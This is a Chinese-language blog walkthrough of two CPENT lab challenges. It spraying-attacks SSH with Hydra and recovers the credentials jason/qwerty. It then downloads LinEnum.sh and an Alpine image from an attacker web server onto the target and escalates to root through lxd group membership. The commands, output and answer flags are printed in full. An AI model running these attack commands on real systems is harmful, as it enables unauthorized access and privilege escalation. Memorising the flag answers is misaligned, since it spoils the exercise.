Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 3.10 (93%), Linux 3.10 - 3.16 (93%), Linux 4.9 (93%), Linux 4.0 (93%), Linux 2.6.18 (90%), Linux 3.10 - 4.11 (89%), Linux 3.11 - 4.1 (89%), Linux 3.2 - 4.9 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 62.31 ms 192.168.200.1
2 10.14 ms 172.16.20.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.80 seconds
只有ssh,所以爆破。注意帳密檔要用官方提供的。另外要注意,如果直接用以下指令:
hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt ssh://172.16.20.7
會很花時間,所以要用密碼噴灑攻擊,詳情可參見以下網址:
Using Hydra to Spray User Passwords
總之最後面要有個-u參數。
┌──(root㉿kali)-[/home/kali/LPT_day1]
└─# hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt ssh://172.16.20.7 -u
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-26 03:53:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1820 login tries (l:35/p:52), ~114 tries per task
[DATA] attacking ssh://172.16.20.7:22/
[22][ssh] host: 172.16.20.7 login: jason password: qwerty
[STATUS] 322.00 tries/min, 322 tries in 00:01h, 1501 to do in 00:05h, 13 active
[STATUS] 317.67 tries/min, 953 tries in 00:03h, 871 to do in 00:03h, 12 active
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 9 final worker threads did not complete until end.
[ERROR] 9 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-26 03:57:36
爆破成功後,從攻擊機用ssh登入:
┌──(root㉿kali)-[/home/kali/LPT_day1]
└─# ssh jason@172.16.20.7
The authenticity of host '172.16.20.7 (172.16.20.7)' can't be established.
ED25519 key fingerprint is SHA256:4uiYffWeZsCsbqxYDpnCxpCpI9a5xqSAytffNxlSD60.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.20.7' (ED25519) to the list of known hosts.
jason@172.16.20.7's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Mar 26 18:13:49 CST 2023
System load: 0.0 Processes: 119
Usage of /: 3.2% of 124.01GB Users logged in: 2
Memory usage: 11% IP address for eth0: 172.16.20.7
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
298 packages can be updated.
196 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Sep 24 10:01:15 2022 from 172.16.1.1
jason@ubuntu:~$
進去後就是用find -name 檔名 -print 2>/dev/null指令來找檔案:
jason@ubuntu:~$ cd /
jason@ubuntu:/$ find -name userflag.txt -print 2>/dev/null
./home/jason/Documents/userflag.txt
jason@ubuntu:/$ cat ./home/jason/Documents/userflag.txt
bu79g82xap
jason@ubuntu:/$ md5sum ./home/jason/Documents/userflag.txt
c43b63f879784511a5914c7ee930d5bf ./home/jason/Documents/userflag.txt
5 (Challenge 29) Compromise the machine with IP address 172.25.20.7, find the file userflag.txt and enter its content as the answer. Ans: bu79g82xap
接下來要提權找rootflag,所以要讓靶機下載linpeas來掃。首先在攻擊機建一個簡單server:
┌──(root㉿kali)-[/home/kali]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
再切到已經ssh的靶機,讓它下載攻擊機的LinEnum跟linpeas腳本:
jason@ubuntu:/$ cd /tmp
jason@ubuntu:/tmp$ wget http://192.168.200.4/LinEnum.sh
--2023-03-26 18:24:20-- http://192.168.200.4/LinEnum.sh
Connecting to 192.168.200.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘LinEnum.sh’
LinEnum.sh 100%[===============================>] 45.54K --.-KB/s in 0.06s
2023-03-26 18:24:20 (804 KB/s) - ‘LinEnum.sh’ saved [46631/46631]
jason@ubuntu:/tmp$ ls -al
total 88
drwxrwxrwt 10 root root 4096 Mar 26 18:24 .
drwxr-xr-x 23 root root 4096 Dec 23 2021 ..
drwxrwxrwt 2 root root 4096 Dec 23 2021 .font-unix
drwxrwxrwt 2 root root 4096 Dec 23 2021 .ICE-unix
-rw-rw-r-- 1 jason jason 46631 Mar 12 16:03 LinEnum.sh
drwx------ 3 root root 4096 Dec 23 2021 systemd-private-8a779ead8eb64e009842b22ee304b506-systemd-resolved.service-T3HiFE
drwx------ 3 root root 4096 Dec 23 2021 systemd-private-8a779ead8eb64e009842b22ee304b506-systemd-timesyncd.service-tZ652O
drwxrwxrwt 2 root root 4096 Dec 23 2021 .Test-unix
drwx------ 2 itop itop 4096 Feb 23 2022 tmux-1000
drwxrwxrwt 2 root root 4096 Dec 23 2021 .X11-unix
drwxrwxrwt 2 root root 4096 Dec 23 2021 .XIM-unix
jason@ubuntu:/tmp$ chmod +x LinEnum.sh
總之掃過以後,可以發現用戶的group有lxd,這是一個漏洞:
[-] Current user/group info:
uid=1001(jason) gid=1001(jason) groups=1001(jason),108(lxd)
對lxd漏洞google一下
exploit-db裡面寫的:
# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine
不過這裡照下面網頁的說明來進行提權:
Lxd Privilege Escalation - Hacking Articles
照網頁說明,攻擊機步驟如下:
Download build-alpine in your local machine through the git repository. (用git clone下載)
Execute the script “build -alpine” that will build the latest Alpine image as a compressed file, this step must be executed by the root user. (下載後build)
Transfer the tar file to the host machine (把出現的tar傳送到靶機)
下面的步驟做到第2步完,出現tar檔。
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 8.39 MiB/s, done.
Resolving deltas: 100% (15/15), done.
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# cd lxd-alpine-builder
┌──(root㉿kali)-[/home/kali/LPT_day2/lxd-alpine-builder]
└─# ./build-alpine
Determining the latest release... v3.17
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.17/main/x86_64
Downloading alpine-keys-2.4-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.12.10-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-6165ee59.rsa.pub: OK
Verified OK
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2573 100 2573 0 0 587 0 0:00:04 0:00:04 --:--:-- 587
--2023-03-27 01:38:34-- http://alpine.mirror.wearetriple.com/MIRRORS.txt
Resolving alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)... 93.187.10.106, 2a00:1f00:dc06:10::106
Connecting to alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)|93.187.10.106|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2573 (2.5K) [text/plain]
Saving to: ‘/home/kali/LPT_day2/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’
/home/kali/LPT_day2/lxd 100%[===============================>] 2.51K --.-KB/s in 0s
2023-03-27 01:38:35 (299 MB/s) - ‘/home/kali/LPT_day2/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’ saved [2573/2573]
Selecting mirror http://download.nus.edu.sg/mirror/alpine//v3.17/main
fetch http://download.nus.edu.sg/mirror/alpine//v3.17/main/x86_64/APKINDEX.tar.gz
(1/25) Installing alpine-baselayout-data (3.4.0-r0)
(2/25) Installing musl (1.2.3-r4)
(3/25) Installing busybox (1.35.0-r29)
Executing busybox-1.35.0-r29.post-install
(4/25) Installing busybox-binsh (1.35.0-r29)
(5/25) Installing alpine-baselayout (3.4.0-r0)
Executing alpine-baselayout-3.4.0-r0.pre-install
Executing alpine-baselayout-3.4.0-r0.post-install
(6/25) Installing ifupdown-ng (0.12.1-r1)
(7/25) Installing libcap2 (2.66-r0)
(8/25) Installing openrc (0.45.2-r7)
Executing openrc-0.45.2-r7.post-install
(9/25) Installing mdev-conf (4.3-r0)
(10/25) Installing busybox-mdev-openrc (1.35.0-r29)
(11/25) Installing alpine-conf (3.15.1-r1)
(12/25) Installing alpine-keys (2.4-r1)
(13/25) Installing alpine-release (3.17.2-r0)
(14/25) Installing ca-certificates-bundle (20220614-r4)
(15/25) Installing libcrypto3 (3.0.8-r1)
(16/25) Installing libssl3 (3.0.8-r1)
(17/25) Installing ssl_client (1.35.0-r29)
(18/25) Installing zlib (1.2.13-r0)
(19/25) Installing apk-tools (2.12.10-r1)
(20/25) Installing busybox-openrc (1.35.0-r29)
(21/25) Installing busybox-suid (1.35.0-r29)
(22/25) Installing scanelf (1.3.5-r1)
(23/25) Installing musl-utils (1.2.3-r4)
(24/25) Installing libc-utils (0.7.2-r3)
(25/25) Installing alpine-base (3.17.2-r0)
Executing busybox-1.35.0-r29.trigger
OK: 10 MiB in 25 packages
┌──(root㉿kali)-[/home/kali/LPT_day2/lxd-alpine-builder]
└─# ls -al
total 6936
drwxr-xr-x 3 root root 4096 Mar 27 01:38 .
drwxr-xr-x 3 root root 4096 Mar 27 01:38 ..
-rw-r--r-- 1 root root 3259593 Mar 27 01:38 alpine-v3.13-x86_64-20210218_0139.tar.gz
-rw-r--r-- 1 root root 3785850 Mar 27 01:38 alpine-v3.17-x86_64-20230327_0138.tar.gz
-rwxr-xr-x 1 root root 8060 Mar 27 01:38 build-alpine
drwxr-xr-x 8 root root 4096 Mar 27 01:38 .git
-rw-r--r-- 1 root root 26530 Mar 27 01:38 LICENSE
-rw-r--r-- 1 root root 768 Mar 27 01:38 README.md
┌──(root㉿kali)-[/home/kali/LPT_day2/lxd-alpine-builder]
└─# cp alpine-v3.13-x86_64-20210218_0139.tar.gz /home/kali/LPT_day2
┌──(root㉿kali)-[/home/kali/LPT_day2/lxd-alpine-builder]
└─# cp alpine-v3.17-x86_64-20230327_0138.tar.gz /home/kali/LPT_day2
接下來要執行第3步,也就是tar檔傳送到靶機,先在tar檔所在處建立server:
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
接下來靶機要做的事如下:
Download the alpine image (下載)
Import image for lxd (lxc image import tar檔)
Initialize the image inside a new container. (lxc init myimage ignite -c security.privileged=true)
Mount the container inside the /root directory
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true lxc start ignite lxc exec ignite /bin/sh實際操作如下:
jason@ubuntu:/tmp$ wget http://192.168.200.4/alpine-v3.17-x86_64-20230327_0138.tar.gz
--2023-03-27 14:04:48-- http://192.168.200.4/alpine-v3.17-x86_64-20230327_0138.tar.gz
Connecting to 192.168.200.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3785850 (3.6M) [application/gzip]
Saving to: ‘alpine-v3.17-x86_64-20230327_0138.tar.gz’
alpine-v3.17-x86_64-202 100%[===============================>] 3.61M 3.61MB/s in 1.0s
2023-03-27 14:04:49 (3.61 MB/s) - ‘alpine-v3.17-x86_64-20230327_0138.tar.gz’ saved [3785850/3785850]
jason@ubuntu:/tmp$ lxc image import alpine-v3.17-x86_64-20230327_0138.tar.gz --alias myimage
Image imported with fingerprint: 537f5b1127b5255f9e7eb9d715dc7883ba4274ea343162f2decd710dbd76c5d5
jason@ubuntu:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | 537f5b1127b5 | no | alpine v3.17 (20230327_01:38) | x86_64 | 3.61MB | Mar 27, 2023 at 6:05am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Mar 27, 2023 at 5:47am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
jason@ubuntu:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
jason@ubuntu:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
jason@ubuntu:/tmp$ lxc start ignite
jason@ubuntu:/tmp$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ #
拿到root後,依然find name:
~ # cd /mnt/root/root
/mnt/root/root # cd /
/ # find -name rootflag.txt
./mnt/root/home/administrator/Documents/rootflag.txt
find: ./sys/kernel/debug: Permission denied
/ # cat ./mnt/root/home/administrator/Documents/rootflag.txt
p5bh39md4k7
6 (Challenge 30) Compromise the machine with IP address 172.25.20.7, find the file rootflag.txt, and enter its content as the answer. Ans: p5bh39md4k7
![[Kotlin] inline 用途](https://cloudwu.coderbridge.io/2022/01/06/kotlin-inline用法/?utm_source=coderbridge-io&utm_medium=blog_related_post_img&utm_campaign=little C Blog_[Kotlin] inline 用途_@imcloudwu939_https://static.coderbridge.com/images/covers/default-post-cover-1.jpg)
